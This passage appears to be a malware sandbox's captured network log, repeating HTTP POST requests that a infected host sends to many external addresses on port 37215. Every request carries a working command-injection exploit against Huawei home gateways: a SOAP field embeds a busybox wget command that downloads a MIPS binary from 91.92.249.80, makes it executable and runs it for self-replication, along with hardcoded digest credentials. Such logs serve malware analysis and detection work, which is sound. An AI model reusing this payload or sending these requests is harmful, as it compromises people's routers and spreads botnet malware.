                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          709192.168.2.233628019.1.9.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217180967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          710192.168.2.2350400157.109.198.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217195034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          711192.168.2.2336828157.208.251.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.217303991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          712192.168.2.234912041.76.50.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222399950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          713192.168.2.2338066197.155.14.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222409964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          714192.168.2.2341210157.75.48.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222429991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          715192.168.2.233863041.29.195.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222500086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          716192.168.2.2355022157.14.243.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222568989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          717192.168.2.2348888103.64.8.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222572088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          718192.168.2.2345358197.162.252.23337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222572088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          719192.168.2.2340094157.28.207.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.222781897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
